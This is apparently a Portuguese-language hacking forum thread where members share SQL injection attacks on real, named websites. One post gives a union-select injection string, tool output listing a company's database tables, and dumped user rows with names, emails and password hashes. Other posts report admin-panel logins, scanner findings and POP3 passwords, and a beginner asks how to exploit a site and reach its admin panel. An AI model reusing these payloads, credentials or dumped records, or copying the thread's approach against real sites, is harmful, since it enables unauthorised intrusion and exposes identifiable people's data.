Tweet
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
-
-
SQL:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...sigpic
"Desde que a humanidade foi agraciada com um talento para cultivar crenças, o absurdo é mais facilmente aceito do que o óbvio."
Comment
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Qnt. Colunas - 22
Versão do Banco - 5.1.43-gpl-logsigpicComment
-
Termolar - sqlinjection
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - SQLInjectoin
Host Information
Server = Apache
Version = 5.0.67-community
Powered by =
Attack Type = SQL Union Injection
Current User = termolar@L50CNN0148
Current Database = termolar
Supports Union = yes
Union Columns = 7
Url| Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vuln: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Union Select 1 ,2,3,4,5, UNHEX(HEX([visible])) ,7
Comment: --
Visible Column: 6
Hexed: True
Cookie:
Keyword:
Param:
Database:termolar
information_schema
termolar
Tables:termolar
01_website_info
02_website_pages
03_admin_textos
04_user_levels
05_website_stats
06_website_gadgets
acessorapido
ambientes
busca
canal_destaque
canal_dicasg
canal_enquetes
canal_enquetes_perfis
canal_enquetes_respostas
canal_novidades
canal_novper
canal_perfis
canal_promocoes
canal_promocoes_form
canal_promocoes_form_perfis
canal_promocoes_form_respostas
canal_promocoes_perfis
canal_promocoes_respostas
contato_sac
contato_tob
contato_toc
contatos
cores
curriculos
dicas
emails_forms
export
faq
flashs_layout
fornecedores
garantias
idiomas
imagens_layout
institucional_porque
institucional_premios
institucional_projetos
institucional_projetos_imagens
institucional_tempo
linhas
news_emails
news_grupos
noticias
personalizados
personalizados_solicitacao
pesquisa
produtos
produtos_ambientes
produtos_categorias
produtos_cores
produtos_frases
produtos_selos
produtos_usos
selos
textos
textos_layout
usos
usuarios
videos
visitantes
Columns: Table usuarios
nome
email
tipo
usuario
senha
nome:email:usuario:senha:
Linea:desenvolvimento@lineacom.com.br:Linea:4c216b 2c716aadf2fad4df64719a4014:
andreia:andreia@termolar.com.br:andreia:511b0e6d8e 57b4ec1d2c6b36b0e32671:sigpicComment
-
Cefet AM
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...Codename: Wh1t3_Dr4g0n [WDR4G0N]
(6):o(H):DComment
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Bem-aventurado o homem que acha sabedoria, e o homem que adquire conhecimento; Provérbios 3:13 Comment
-
anddr, ql a vulnerabilidade?Codename: Wh1t3_Dr4g0n [WDR4G0N]
(6):o(H):DComment
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ja fiz um topico mais vou colocar a qui Ok ...
8001 Vronf Login
2077 Http Login
O proximo e guiadohacker.com.br
KKKKK Brincadeira xD mais ja vi telas de Login =*Comment
-
como posso checar para ver se este site esta vulneravel e como posso tirar proveito disso?
site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
o resultado do link acima é:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/ocomon/geral/tempo_doc.php on line 70Comment
-
velho to em duvida nesse erro , se fosse SQL syntax eu teria certeza de que era vulneravel... mais testa ai os order by dps union select e etc.Comment
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Mais o fórum... Mas mais do que colocar o forum em baixo gostava de saber como faz passo por passo para aprender e mais truque como por exemplo entra no painel de admin...
Abraços de um iniciante Portuga...Comment
-
E ae galera.
De uma olhada ae.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Bom, ordenando as tabelas ja descobri que tem 12 colunas. Como sou noob ainda, fiquei meio perdido. Tentando por SQL básico, na parte do comando union all select x,x,x,x,x,x from admin eu travei...
Agora é com vocês = )"Sou apenas mais um entre muitos..."Comment
-
User: ciegoApenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
password: ciego
SQLi
Tive acesso a area administrativa do site, mas não pichei, tava meio sme tempo, mas tirei print para provar que tive o acesso..
Se a imagem tiver grande, peço desculpas (1280x720)
Comment
-
Sou novo nessa área de SQLi e invasãoes etc..
Meu negocio mesmo é hacking voltado a programação...
Mas de vez em quando é bom acessar um site vulneravel e passar umas horinhas se divertindoComment
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Página intrigante: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
De acordo com o Acunetix: 90 vulns SQLi ("/category.php" & "/product.php"); 180 vulns XSS; 4 erros POP3. Ao todo são 253 erros nivel High
As senhas do servidor POP3 são:
Username: root Password: xampp
Username: dude Password: trustno1
Username: tmp Password: temp
Assim que conseguir a senha do Administrador eu posto aqui. O site é chulo mas dá pra passar uns 10 minutos...Comment
Comment